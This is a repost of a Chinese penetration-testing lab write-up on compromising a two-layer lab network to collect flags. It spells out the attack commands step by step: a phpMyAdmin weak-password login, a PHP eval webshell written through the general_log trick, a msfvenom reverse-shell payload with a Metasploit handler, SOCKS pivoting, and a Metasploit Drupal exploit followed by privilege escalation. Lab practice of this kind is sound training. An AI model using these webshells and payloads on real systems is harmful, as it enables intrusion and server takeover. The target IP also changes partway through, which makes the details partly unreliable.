【渗透测试】记一次某渗透测试靶场writeup

admin 2024年5月22日21:36:25评论3 views字数 1648阅读5分29秒阅读模式
点击蓝字
【渗透测试】记一次某渗透测试靶场writeup
关注我们

【渗透测试】记一次某渗透测试靶场writeup

【渗透测试】记一次某渗透测试靶场writeup
【渗透测试】记一次某渗透测试靶场writeup
微信搜一搜
【渗透测试】记一次某渗透测试靶场writeup
暗魂攻防实验室

一、靶机信息

攻击机:kali ip:192.168.0.128第一层靶机:windows ip:192.168.0.129 172.24.10.129第二层靶机:linux ip:172.24.10.128

二、解题思路

利用弱口令进入phpmyadmin后台,获取key6;在phpmyadmin中写马获取第一层靶机的服务器权限,从网站根路径获取key7;在第一层靶机的回收站里面获取key8;以第一层靶机作为跳板机获取第二层靶机的服务器权限,利用find提权获取key。

三、解题步骤

1、nmap扫描第一层靶机(ip:192.168.0.129)开放的端口,发现80端口是开放的。


2、直接访问192.168.0.129发现phpinfo()页面,可以获取网站路径

【渗透测试】记一次某渗透测试靶场writeup

3、在kaili中利用该命令

gobuster dir -u http://192.168.224.136/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,zip

扫描网站目录,发现key.txt和phpmyadmin页面,访问http://192.168.224.136/key.txt获取到key7
【渗透测试】记一次某渗透测试靶场writeup

4、访问http://192.168.224.136/phpmyadmin,利用弱口令root/空成功进入后台,发现key6
【渗透测试】记一次某渗透测试靶场writeup

5、通过phpinfo()泄露的路径,在phpmyadmin中写马

show variables like "%general%";SET GLOBAL general_log='on'SET GLOBAL general_log_file='C:\phpstudy_pro\WWW\1025.php'SELECT '<?php eval($_POST["cmd"]);?>'

成功在网站根目录下写入1025.php木马文件

6、利用蚁剑连接,成功获取到服务器权限,在网站根目录下发现key7,回收站中发现key8
【渗透测试】记一次某渗透测试靶场writeup
【渗透测试】记一次某渗透测试靶场writeup

7、在kali攻击机上用

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.128 LPORT=4444 -f exe -o mqc.exe

生成木马文件mqc.exe,通过蚁剑上传到网站根目录。在攻击机上打开msf,输入

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp

设置好相应的ip和端口,run启动


8、成功反弹shell后,输入

run autoroute -s 172.24.10.0/255.255.255.0

添加路由

  use auxiliary/server/socks_proxy  show options  set srvhost  127.0.0.1  set srvport   9999  set version 4a  run

在攻击机终端中输入vim /etc/proxychains.conf添加socks4 127.0.0.1 9999,至此,代理设置完成。

9、利用

proxychains nmap -sS -Pn 172.24.10.128

扫描第二层靶机(ip:172.24.10.128)的端口,发现22、80、111端口是开放的。访问80端口发现是drupal
【渗透测试】记一次某渗透测试靶场writeup

10、另起终端到msf中搜索drupal的漏洞,选择第一个直接进行利用

  proxychains msfconsole  search drupal  use 1  show options  set RHOSTS 172.24.10.128  set payload php/meterpreter/bind_tcp  run

利用成功后,输入

python -c 'import pty;pty.spawn("/bin/bash")'

生成交互式shell,然后利用find进行提权成功获取key

【渗透测试】记一次某渗透测试靶场writeup

【渗透测试】记一次某渗透测试靶场writeup

原文始发于微信公众号(暗魂攻防实验室):【渗透测试】记一次某渗透测试靶场writeup

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月22日21:36:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【渗透测试】记一次某渗透测试靶场writeuphttps://cn-sec.com/archives/2767597.html

发表评论

匿名网友 填写信息